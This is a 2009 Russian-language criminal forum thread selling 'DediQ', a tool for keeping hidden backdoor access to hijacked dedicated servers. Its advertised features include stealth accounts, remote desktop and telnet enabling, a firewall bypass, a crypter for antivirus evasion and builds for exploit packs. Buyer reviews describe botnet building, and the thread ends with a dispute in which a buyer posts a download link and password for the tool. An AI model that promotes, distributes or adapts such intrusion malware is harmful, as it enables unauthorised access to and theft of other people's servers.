PDA

Просмотр полной версии : DediQ 1.7

[QwyZ]
11.09.2009, 15:55
продаю программу,которая облегчит жизнь всем брутерам дедиков и всем, кто работает с дедиками.ето программа написана мной и служит для:

[x] открытия бекдора без добавления новых ползователей и неиспользуя аккаунт "администратор".администратор понадобится только один раз - для запуска данной проги. / ето одно из главных приимуществ программы - админ просто несможет вас найти
[x] автоматическая настройка удаленного раб.стола - даже школьный компьютер может после запуска быть дедом. / исключено если соединение NAT - NAT
[x] xайд из винлогона,хайд папки профиля в documents and settings
[x] открытие телнета
[x] сборка системной инфы для продаж.
[x] работа через консоль

цена : 25$

[+] добавилась сборка для сплойтпаков
[+] добавилась сборка с веб админкой
[+] добавлен autorun и stealth мод
[+] добавлен ipconfig на админку - проверка NAT/ne NAT
[+] появился приватный криптер - крипт можно покупать у меня
[!] добавлен 2ip.ru log на админку - проверка страны и реверс DNS
[!] добавлен обход файрвола,были баги на некоторых дедах

Начальная сборка - 25$
Полный комплект - 100$

возможно добавление ваших функций или даже файлов в сборку билда.договоримся по аське.

будьте готовы предоставить мне некоторые данные для билда,а ето:
> пароль.который будет стоять на ваших дедах
> ваш фтп сервер (логин / пасс / серв)
> при заказе веб админки - путь до админки (http://)

деньги вперед,WMZ,WMR,WME
продам сорцы - (60$ х 10 = 600$)

Black dead
13.09.2009, 17:14
купил прогу с веб админкой рабочая 100 процентов , рутятся правда только те машины на которых разрешен удаленый рабочий стол
селеру респект

Xcontrol212
16.09.2009, 20:15
купил,все нормально,чел профиксил багу,респект

swentos
17.09.2009, 20:30
купил прогу,нормально работает, 3 дня - 59 ботнет со сплоитпака. очень хорошая вешь. спасибо автору.

ALONMP3
17.09.2009, 20:43
Сборку купил, до этого бывали случаи когда админ засекал мое присутствие на компе-сейчас даж не парюсь об этом,удобно поставлен сбор информации о характеристиках дедика,пришлось также докупить крипт-ибо почти на всех дедиках где стоит антивирь запускать эту програмулину проблематично =) автор красавец, небольшие бонусы получил.

suplex
06.10.2009, 13:20
Брал. Есть замечания, но, в общем, денег своих стоит. С автором можно договориться.
Одно пожелание - продолжай развивать продукт.

E)(ploit
12.10.2009, 23:45
Купил прогу. Работает отлично, постоянно техническая поддержка от автора. Автору большой респект, очень удобно работать. Главное дальше развивать продукт, многим без него никак для комфортной работы.

djekxa
21.10.2009, 22:22
купил софт все отлично

AllenZ
21.10.2009, 22:27
Ещё 1 АП не по правилам, тема будет удалена.

AllenZ
25.10.2009, 18:45
ТС между прочим писал кроме "ап" еще и об акции скидки 20%

Для этого есть кнопочка "edit" в первом посте...

[QwyZ]
07.11.2009, 00:51
up,opyat skidki

Gallardo
17.11.2009, 17:50
Будьте осторожны!!! [QwyZ] кидала!!!

[x] открытия бекдора без добавления новых ползователей и неиспользуя аккаунт "администратор".администратор понадобится только один раз - для запуска данной проги. / ето одно из главных приимуществ программы - админ просто несможет вас найти

Купил у ТС софт из-за единственного этого обещания. и фраз что дедики с этим софтом будут долго жить, админы не заметят мое существование на дедиках.
вобщем дела обстоят так:
Софт создает пользователя (!) из-под аккаунта администратора. В списке пользователей системы он виден, и ни разу не скрыт. Идем дальше. Пользователя видно в списке активных пользователей в таск менеджере, также видны все его процессы. Папка созданного пользователя C:\Documents and Settings\SUPPORT_*** просто "скрыта", но ее видно если убрать галочку отображать скрытые папки.
Выходит софт только для сбора инфы о компе, а она на*** не нужна! я дедик покупаю итак с заранее известным мне конфигом, да и определить конфиг можно паблик софтом!

Вот еще лог с этим жидо-кидосом, потребовал еще чтоб я ему заплатил деньки со скидки, о которой он говорил постом выше :D :

me (16:24:43 17/11/2009)
тогда толку от твоего софта 0, если юзер палится

©QwyZ© (16:25:01 17/11/2009)
komu kak, nikto krome tebya poka nezhalovalsa

©QwyZ© (16:27:27 17/11/2009)
otzyv nezabud napisat, esli tebya neustraivaet soft i pisat nehochesh - plati +10$ na kotorye ya te skinul

me (16:27:55 17/11/2009)
щас блек напишу и ты мне вернешь 45$

©QwyZ© (16:28:07 17/11/2009)
D nu davai pishi pishi

[QwyZ]
17.11.2009, 18:02
---

Flanker48
17.11.2009, 18:32
']несоздает - саппорт есть на всех компах, просто добавляет пароль и ставит его с дисейблед на енейблед
Ахахаха, а ручками что мешает это сделать за 2 минуты?
неври - из винлогона он скрыт (емое етоже легко через реестр сделать)
Это для XP чтоли? Так а кто юзает ХР вообще?

[QwyZ]
17.11.2009, 23:11
---

[QwyZ]
17.11.2009, 23:25
---

Gallardo
17.11.2009, 23:26
неври - из винлогона он скрыт (емое етоже легко через реестр сделать)
Я ничего не вру. Вообще про винлогон тебе ничего не говорил! Везде юзер виден. Ничего не скрывается! на винлогон мне по***, т.к. под дедики используются 2003! А даже если там и скрывает - то это как мертвому припарка, т.к. везде в остальных местах юзер жестко палится!
Ты писал про нивротебацо крутой софт, который скроет мое присутствие на дедике!

Gallardo
17.11.2009, 23:29
Софту место в паблике, а селлеру место в кидалах!

[QwyZ]
17.11.2009, 23:31
---

Gallardo
17.11.2009, 23:56
ето одно из главных приимуществ программы - админ просто несможет вас найти
за свои слова нужно отвечать.

никого не волнует? ;)

говно софт, автора, который бросает свои слова на ветер. ничего не скрывает. ну мало ли может кому-то интересно:
http://www.sendspace.com/file/7qqwir
без каких либо привязок. пароль 99DediQ88)

на других форумах тоже выложу.

Gallardo
18.11.2009, 00:00
урок на будущее
не стоит быть таким понтовитым. не быть конченым жидом. отвечать за свои слова. не кидать.

Flanker48
18.11.2009, 00:01
']открытия бекдора без добавления новых ползователей и неиспользуя аккаунт "администратор".администратор понадобится только один раз - для запуска данной проги.[COLOR=DarkOrange] / ето одно из главных приимуществ программы - админ просто несможет вас найти
Это создание обычной учётки уже считается бекдором? оО. Интересно как он не сможет меня найти? Папки юзера будут палиться, в диспетчере будет палиться... Вот скажи, что она делает чтобы админ не нашёл? Такой бред вообще. Как хорошо, что я не вляпался в это г. Вот почему ты видео так и не предоставил, теперь всё ясно

Чето функции в первом посте поменялись. Доработал чтоли? *ROFL*